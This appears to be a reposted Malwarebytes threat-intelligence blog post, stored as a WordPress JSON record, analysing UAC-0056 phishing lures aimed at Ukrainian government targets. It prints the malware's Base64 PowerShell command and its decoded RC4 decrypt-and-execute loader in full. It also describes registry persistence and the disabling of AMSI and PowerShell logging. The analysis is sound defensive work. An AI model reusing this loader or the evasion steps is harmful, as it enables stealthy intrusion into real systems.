{"id":19587,"date":"2022-07-13T09:47:39","date_gmt":"2022-07-13T17:47:39","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/07\/13\/news-13320\/"},"modified":"2022-07-13T09:47:39","modified_gmt":"2022-07-13T17:47:39","slug":"news-13320","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/07\/13\/news-13320\/","title":{"rendered":"Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign"},"content":{"rendered":"<p><strong>Credit to Author: Threat Intelligence Team| Date: Wed, 13 Jul 2022 16:17:09 +0000<\/strong><\/p>\n<p><em>This blog was authored by Roberto Santos and Hossein Jazi<\/em><\/p>\n<p>The Malwarebytes Threat Intelligence team recently reviewed a series of cyber attacks against Ukraine that we attribute with high confidence to UAC-0056 (AKA&nbsp;UNC2589, TA471). This threat group has repeatedly targeted the government entities in Ukraine via phishing campaigns following the same common tactics, techniques and procedures (TTPs).<\/p>\n<p>Lures are based on important matters related to the ongoing war and humanitarian disaster happening in Ukraine. We have been closely monitoring this threat actor and noticed changes in their macro-based documents as well as their final payloads.<\/p>\n<p>In this blog, we will connect the dots between different decoy samples that we and others such as Ukraine CERT have observed. We will also share indicators for a previously undocumented campaign performed by the same threat actor at the end of June.<\/p>\n<h1>Different themes, same techniques<\/h1>\n<p>Since the publication of our blog post&nbsp;<em><a href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/04\/new-uac-0056-activity-theres-a-go-elephant-in-the-room\/\">There\u2019s a Go Elephant in the room<\/a><\/em>, we have tracked several new samples as can be seen in the timeline below:<\/p>\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Main.png\" data-rel=\"lightbox-image-0\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"58364\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/attachment\/main-91\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Main.png\" data-orig-size=\"1536,734\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Main\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Main-300x143.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Main-600x287.png\" width=\"1536\" height=\"734\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Main.png\" alt=\"\" class=\"wp-image-58364\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Main.png 1536w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Main-300x143.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Main-600x287.png 600w\" sizes=\"auto, (max-width: 1536px) 100vw, 1536px\" \/><\/a><figcaption>Figure 1: Relations between different UAC-0056 attributed samples<\/figcaption><\/figure>\n<p>Let&#8217;s dig further into those relationships. <a href=\"https:\/\/cert.gov.ua\/article\/619229\">UA-CERT<\/a>&nbsp;has attributed the document named &#8220;<em>Information on the availability of <strong>vacancies<\/strong> and their staffing.xls<\/em>&#8221; to UAC-0056. This file looked familiar to us and for good reason because the macro is nearly identical to the document we analyzed in our initial blog:<\/p>\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure2.png\" data-rel=\"lightbox-image-1\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"58360\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/attachment\/figure2-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure2.png\" data-orig-size=\"1820,972\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Figure2\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure2-300x160.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure2-600x320.png\" loading=\"lazy\" width=\"1820\" height=\"972\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure2.png\" alt=\"\" class=\"wp-image-58360\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure2.png 1820w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure2-300x160.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure2-600x320.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure2-1536x820.png 1536w\" sizes=\"auto, (max-width: 1820px) 100vw, 1820px\" \/><\/a><figcaption>Figure 2: Detail of Vacancies and GoElephant dropper macros<\/figcaption><\/figure>\n<p>In the most recent attack reported by&nbsp;<a href=\"https:\/\/cert.gov.ua\/article\/703548\">UA-CERT<\/a>&nbsp;(<em><strong>Humanitarian catastrophe<\/strong> of Ukraine since February 24, 2022.xls<\/em>) we see an almost identical macro to the one used in another decoy document called&nbsp;<em>Help Ukraine.xls<\/em>:<\/p>\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure3.png\" data-rel=\"lightbox-image-2\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"58355\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/attachment\/figure3-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure3.png\" data-orig-size=\"1735,872\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Figure3\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure3-300x151.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure3-600x302.png\" loading=\"lazy\" width=\"1735\" height=\"872\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure3.png\" alt=\"\" class=\"wp-image-58355\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure3.png 1735w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure3-300x151.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure3-600x302.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure3-1536x772.png 1536w\" sizes=\"auto, (max-width: 1735px) 100vw, 1735px\" \/><\/a><figcaption>Figure 3: Detail of Help Ukraine and Humanitarian catastrophe macros<\/figcaption><\/figure>\n<p>The <strong>Help Ukraine<\/strong> lure, to our knowledge, has never been publicly documented before:<\/p>\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure4.png\" data-rel=\"lightbox-image-3\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"58351\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/attachment\/figure4-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure4.png\" data-orig-size=\"1496,871\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Figure4\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure4-300x175.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure4-600x349.png\" loading=\"lazy\" width=\"1496\" height=\"871\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure4.png\" alt=\"\" class=\"wp-image-58351\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure4.png 1496w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure4-300x175.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure4-600x349.png 600w\" sizes=\"auto, (max-width: 1496px) 100vw, 1496px\" \/><\/a><figcaption>Figure 4: Help Ukraine lure used in late July<\/figcaption><\/figure>\n<p>We were able to identify 7 different samples with that theme, including one (<a href=\"https:\/\/www.virustotal.com\/gui\/file\/258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0\" target=\"_blank\" rel=\"noreferrer noopener\">258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0<\/a>) that has some similarities with a previous attack:<\/p>\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure5.png\" data-rel=\"lightbox-image-4\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"58356\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/attachment\/figure5-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure5.png\" data-orig-size=\"490,163\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Figure5\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure5-300x100.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure5.png\" loading=\"lazy\" width=\"490\" height=\"163\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure5.png\" alt=\"\" class=\"wp-image-58356\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure5.png 490w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure5-300x100.png 300w\" sizes=\"auto, (max-width: 490px) 100vw, 490px\" \/><\/a><figcaption>Figure 5: Similarities between different versions<\/figcaption><\/figure>\n<p>Also, in the past we have found comments regarding to a domain named ExcelVBA[.]ru. This document was contacting a suspiciously similar domain named excel-vba[.]ru.<\/p>\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure6.png\" data-rel=\"lightbox-image-5\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"58363\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/attachment\/figure6-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure6.png\" data-orig-size=\"1806,672\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Figure6\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure6-300x112.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure6-600x223.png\" loading=\"lazy\" width=\"1806\" height=\"672\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure6.png\" alt=\"\" class=\"wp-image-58363\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure6.png 1806w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure6-300x112.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure6-600x223.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure6-1536x572.png 1536w\" sizes=\"auto, (max-width: 1806px) 100vw, 1806px\" \/><\/a><figcaption>Figure 6: Similarities between different versions (2)<\/figcaption><\/figure>\n<p>Among victims, we find gov.ua emails being targeted. One of the texts used as email body in the last campaign was written in Ukrainian and translates to:<\/p>\n<blockquote class=\"wp-block-quote\">\n<p><em>On February 24, 2022, the army of the terrorist state &#8211; the Russian Federation, intervened on the territory of Ukraine. In order to counter the propaganda of the Russian government, the State Department of Statistics at the Office of the President of Ukraine prepared a consolidated report on the dead citizens of Ukraine, on the citizens of Ukraine who were left without a home, on the citizens of Ukraine who lost their jobs, on the number of destroyed homes, on the number of destroyed businesses as a result of an act of aggression . This report shows all the data broken down by regions of Ukraine. Familiarize yourself and familiarize your colleagues with the real state of affairs. Glory to Ukraine<\/em>!<\/p>\n<p><cite>Translation of original email sent to victims<\/cite><\/p><\/blockquote>\n<p>We will focus our analysis on these 3 newer templates. Exact names and paths are from <a href=\"https:\/\/www.virustotal.com\/gui\/file\/024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1\" target=\"_blank\" rel=\"noreferrer noopener\">024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1<\/a> (<em>Information on the availability of vacancies and their staffing.xls<\/em>). The analysis is still valid for the others, while minor changes exist between samples.<\/p>\n<h2>write.bin<\/h2>\n<p>The document will download an executable file named <em>write.bin<\/em>. Other attacks following the same scheme used different names for this file, including <em>Office.exe<\/em>, <em>baseupd.exe<\/em> and <em>DataSource.exe<\/em>. The file is slightly obfuscated, and performs the following actions:<\/p>\n<h2>Establishing persistence<\/h2>\n<p>After some antidebug tricks, the registry key <code>HKCUSoftwareMicrosoftWindowsCurrentVersionRunCheck License<\/code> is used to establish persistence. <code>HKCUSoftwareMicrosoftWindowsCurrentVersionRunUpdate Checker<\/code>, is checked first because that was the key used by previous versions of the malware.<\/p>\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure7.png\" data-rel=\"lightbox-image-6\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"58357\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/attachment\/figure7-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure7.png\" data-orig-size=\"775,150\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Figure7\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure7-300x58.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure7-600x116.png\" loading=\"lazy\" width=\"775\" height=\"150\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure7.png\" alt=\"\" class=\"wp-image-58357\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure7.png 775w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure7-300x58.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure7-600x116.png 600w\" sizes=\"auto, (max-width: 775px) 100vw, 775px\" \/><\/a><figcaption>Figure 7: Run key for persistence<\/figcaption><\/figure>\n<h2>Dropping next stage<\/h2>\n<p>Next step is dropping a file in <em>C:ProgramDataTRYxaEbX<\/em>. &nbsp;This file will be used later.<\/p>\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure8.png\" data-rel=\"lightbox-image-7\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"58358\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/attachment\/figure8-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure8.png\" data-orig-size=\"800,304\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Figure8\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure8-300x114.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure8-600x228.png\" loading=\"lazy\" width=\"800\" height=\"304\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure8.png\" alt=\"\" class=\"wp-image-58358\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure8.png 800w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure8-300x114.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure8-600x228.png 600w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/a><figcaption>Figure 8: Powershell commandline shown in IDA Pro<\/figcaption><\/figure>\n<p>The payload will execute the following powershell Base64 encoded command:<\/p>\n<p><code>JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIAWAAiACkAOwAKACQAQgAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAQwBtAEEASgBuAGcAdgBkAEQAbQBpAFQAagBMAHgATgAiACkAOwAKACQAQQA9AHsAJABXACwAJABZAD0AJABBAHIAZwBzADsAJABYAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAFoAPQAoACQAWgArACQAWABbACQAXwBdACsAJABZAFsAJABfACUAJABZAC4ATABlAG4AZwB0AGgAXQApACUAMgA1ADYAOwAkAFgAWwAkAF8AXQAsACQAWABbACQAWgBdAD0AJABYAFsAJABaAF0ALAAkAFgAWwAkAF8AXQB9ADsAJABXAHwAJQB7ACQAVQA9ACgAJABVACsAMQApACUAMgA1ADYAOwAkAFYAPQAoACQAVgArACQAWABbACQAVQBdACkAJQAyADUANgA7ACQAWABbACQAVQBdACwAJABYAFsAJABWAF0APQAkAFgAWwAkAFYAXQAsACQAWABbACQAVQBdADsAJABfAC0AYgB4AG8AcgAkAFgAWwAoACQAWABbACQAVQBdACsAJABYAFsAJABWAF0AKQAlADIANQA2AF0AfQB9ADsACgAkAEMAIAA9ACAAKAAmACAAJABBACAAJABBADEAIAAkAEIAMQApADsACgAkAEUAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEMALAAwACwAJABDAC4ATABlAG4AZwB0AGgAKQA7AAoAJABFACAAPQAgACQARQAgAC0AUwBwAGwAaQB0ACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQA7AAoAZgBvAHIAZQBhAGMAaAAoACQARQBFACAAaQBuACAAJABFACkAewBpAGUAeAAgACQAKAAkAEUARQArACIAOwAiACkAOwB9ADsA<\/code><\/p>\n<figure class=\"wp-block-image\"><a href=\"https:\/\/threatnote.malwarebytes.com\/images\/threatnote-prod\/1656633600\/96951aa5-4fab-4188-ad33-d72fcaa7aafe.png\" data-rel=\"lightbox-image-8\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" src=\"https:\/\/threatnote.malwarebytes.com\/images\/threatnote-prod\/1656633600\/96951aa5-4fab-4188-ad33-d72fcaa7aafe.png\" alt=\"96951aa5-4fab-4188-ad33-d72fcaa7aafe.png (565\u00d7466)\" \/><\/a><figcaption>Figure 9: Write executable creating the previous detailed powershell command<\/figcaption><\/figure>\n<p>The chunk before is Base64 encoded; which decodes to:<\/p>\n<p><code>$A1 = [System.IO.File]::ReadAllBytes(\"C:ProgramDataTRYxaEbX\");<\/code><\/p>\n<p><code>$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};<\/code><\/p>\n<p><code>$C = (&amp; $A $A1 $B1);<\/code><\/p>\n<p><code>$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);<\/code><\/p>\n<p><code>$E = $E -Split [Environment]::NewLine;<\/code><\/p>\n<p><code>foreach($EE in $E){iex $($EE+\";\");};<\/code><\/p>\n<p>In short the file dropped in&nbsp;<code><em>C:ProgramDataTRYxaEbX<\/em><\/code> will be decrypted using&nbsp;<code>CmAJngvdDmiTjLxN<\/code> as key using the RC4 algorithm. This next PowerShell script will look like:<\/p>\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure10.png\" data-rel=\"lightbox-image-9\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"58361\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/attachment\/figure10\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure10.png\" data-orig-size=\"2098,683\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Figure10\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure10-300x98.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure10-600x195.png\" loading=\"lazy\" width=\"2098\" height=\"683\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure10.png\" alt=\"\" class=\"wp-image-58361\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure10.png 2098w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure10-300x98.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure10-600x195.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure10-1536x500.png 1536w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure10-2048x667.png 2048w\" sizes=\"auto, (max-width: 2098px) 100vw, 2098px\" \/><\/a><figcaption>Figure 10: Decoded PowerShell stage<\/figcaption><\/figure>\n<p>Here we can see some of the actions that will be taken:<\/p>\n<ul>\n<li>Disable script logging<\/li>\n<li>Disable Module Logging<\/li>\n<li>Disable Transcription<\/li>\n<li>Disable AMSI protection<\/li>\n<\/ul>\n<p>After this step, another Base64 payload is decoded and executed:<\/p>\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure11.png\" data-rel=\"lightbox-image-10\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"58362\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/attachment\/figure11\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure11.png\" data-orig-size=\"2098,616\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Figure11\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure11-300x88.png\" 